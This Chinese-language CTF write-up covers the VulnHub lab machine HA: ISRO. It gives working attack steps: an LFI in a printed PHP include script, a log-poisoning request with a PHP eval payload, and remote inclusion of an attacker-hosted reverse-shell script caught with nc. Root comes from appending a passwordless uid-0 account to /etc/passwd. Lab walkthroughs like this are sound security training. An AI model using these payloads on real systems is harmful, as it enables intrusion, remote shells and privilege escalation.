欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

ha:isro靶机 writeup(并不完整)

程序员文章站 2022-05-17 16:46:01
...

靶机地址: https://www.vulnhub.com/entry/ha-isro,376/

根据作者的提示,一共四个flag,主要测试枚举的能力,后面我才发现是枚举说的是社工。。。

  1. Aryabhata
  2. Bhaskara
  3. Mangalyaan
  4. Chandrayaan 2

0x01 遇事不决nmap

nmap扫描结果:

192.168.109.129

22 ssh

80 http

没有3306,也就是没开数据库,大概率找后台然后文件上传拿shell

0x02 敏感目录扫描

wfuzz配上字典来一发

index.html

connect.php

?.php //没啥用,其实就不是文件

/img 这个地方成功找到第一个flag,Aryabhata.jpg binwalk了一下,也没藏什么东西,先往后稍稍

/bhaskara.html 源代码的Footer位置,出现一个神秘的base64

<!-- Footer -->
<!--BHASKARA LAUNCH CODE: L2JoYXNrYXJh -->
<footer class="w3-container w3-padding-64 w3-center w3-opacity w3-light-grey w3-xlarge">
 <p class="w3-medium">Powered by <a href="https://hackingarticles.in" target="_blank">Hacking Articles</a></p>
</footer>
</body>
</html>

解码得到/bhaskara ,访问,出现一个下载文件 IDA打开发现是个二进制文件,file命令显示是个data文件,扔binwalk也没发现有什么隐藏信息,先放放

0x03 准备测试connect.php的位置

查了一下twitter的大佬们,从web入手,现在就是找后台或者接着测connect.php

php伪协议

connect.php?file=php://filter/read=convert.base64-encode/resource=connect.php

connect.php
<?php
   $file = $_GET['file'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("index.php");
   }
?>
    
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false
    
    
    
    

查看apt的安装历史,发现装了unzip,mysql-client,mysql-server,php7.2,vsfftp,apache2,openssh-server,

去twitter看了一下大佬以前的文章,发现一个好玩的东西 LFI的Aache日志中毒,测一下试试

编写payload

GET /connect.php?file=connetc.php HTTP/1.1
Host: 192.168.109.129
User-Agent: Mozilla/5.0 <?php eval($_GET('a'))?> Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

/connect.php?file=/var/log/apt/history.log

很可惜,没有回显,估计没给访问的权限,放弃

 

0x04 测试Bin文件bhaskara

binwalkstrings命令都没有发现有用的东西,查看十六进制也没发现什么好玩的,根据服务器上apt安装的服务的确想不出来应该是什么文件

0x05 收集twitter信息

一个LFI的Aache日志中毒,一个用于Pentester的Linux: APT特权升级,一个Exploiting Wildcard for Privilege Escalation

很遗憾,并不是日志污染,还是年轻了,这就是个SSRF。。。

kali把自带的nginx打开,/etc/init.d/nginx start,防火墙80端口打开,然后扔一个php反弹shell脚本进/var/www/html目录,再访问靶机的connect.php

connect.php?file=http://192.168.109.128/reverse.php

kali来一个nc -lvvp 1145,摸到shell

 

然后 ls -al /etc/passwd会发现是可读权限,直接菜鸡提权术

echo "kui::0:0:::/bin/bash" >>/etc/passwd

进root目录下看看,发现final.txt,好吧,直接通关

ha:isro靶机 writeup(并不完整)

 

想起前面还有个数据库,没想到直接一个mysql就进去了,密码都不用输,之后就是show databases,show tables,select * from flag完事。

ha:isro靶机 writeup(并不完整)

 

0x06 逝去的bhaskara(没整完,配置起来有点麻烦)

file bhaskara查看,依旧是data数据,根据大佬的writeup,这个竟然需要解密,web不行密码学来凑(你不说谁懂这个啊)

这里用到一个曾经也辉煌过的加密方式,truecrypt,这个是14年之后就停止更新了,所以不知道很正常

大佬给出的解密方法

https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/truecrypt2john.py

python true.py bhaskara > hashes
john hashes --show
#!/usr/bin/env python

# TrueCrypt volume importion to a format usable by John The Ripper
#
# Written by Alain Espinosa <alainesp at gmail.com> in 2012.  No copyright
# is claimed, and the software is hereby placed in the public domain.
# In case this attempt to disclaim copyright and place the software in the
# public domain is deemed null and void, then the software is
# Copyright (c) 2012 Alain Espinosa and it is hereby released to the
# general public under the following terms:
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# There's ABSOLUTELY NO WARRANTY, express or implied.
#
# (This is a heavily cut-down "BSD license".)
#
# Ported to Python by Dhiru Kholia, in June of 2015

import sys
from os.path import basename
import binascii


def process_file(filename, keyfiles):

    try:
        f = open(filename, "rb")
    except Exception as e:
        sys.stderr.write("%s : No truecrypt volume found? %s\n" % str(e))
        return

    header = f.read(512)  # encrypted header of the volume
    if len(header) != 512:
        f.close()
        sys.stderr.write("%s : Truecrypt volume file to short: Need at least 512 bytes\n", filename)
        return

    for tag in ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"]:
        sys.stdout.write("%s:%s$" % (basename(filename), tag))
        sys.stdout.write(binascii.hexlify(header))
        if keyfiles:
            nkeyfiles = len(keyfiles)
            sys.stdout.write("$%d" % (nkeyfiles))
            for keyfile in keyfiles:
                sys.stdout.write("$%s" % keyfile)
        sys.stdout.write(":normal::::%s\n" % filename)

    # try hidden volume if any
    f.seek(65536, 0)
    if f.tell() != 65536:
        f.close()
        return
    header = f.read(512)
    if len(header) != 512:
        f.close()
        return

    for tag in ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"]:
        sys.stdout.write("%s:%s$" % (basename(filename), tag))
        sys.stdout.write(binascii.hexlify(header))
        if keyfiles:
            nkeyfiles = len(keyfiles)
            sys.stdout.write("$%d" % (nkeyfiles))
            for keyfile in keyfiles:
                sys.stdout.write("$%s" % keyfile)
        sys.stdout.write(":hidden::::%s\n" % filename)

    f.close()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.stderr.write("Error: No truecrypt volume file specified.\n")
        sys.stderr.write("\nUtility to import TrueCrypt volume to a format crackeable by John The Ripper\n")
        sys.stderr.write("\nUsage: %s volume_filename [keyfiles(s)]> output_file\n" % sys.argv[0])
        sys.exit(-1)

    keyfiles = []
    if len(sys.argv) > 2:
        keyfiles = sys.argv[2:]

    process_file(sys.argv[1], keyfiles)

好吧,没有字典似乎是整不动,而且有点过于麻烦(指针对web狗来,有兴趣的可以去大佬的writeup上看看)

0x07图片隐写

在img目录下有张跟周围完全不大的图片,下载下来,根据提示这个就是隐藏flag的地方了 binwalk来一个,没用。。。 根据作者的writeup,需要一个steghide,直接 apt-get install steghide就完事了 在跟一个steghide extract -sf aryabhata.jpg,完事 

ha:isro靶机 writeup(并不完整)

等有空再把bhaskara的flag拿了吧(指摸了)

 

参考链接:

https://www.hackingarticles.in/ha-isro-vulnhub-walkthrough/

 

相关标签: 靶机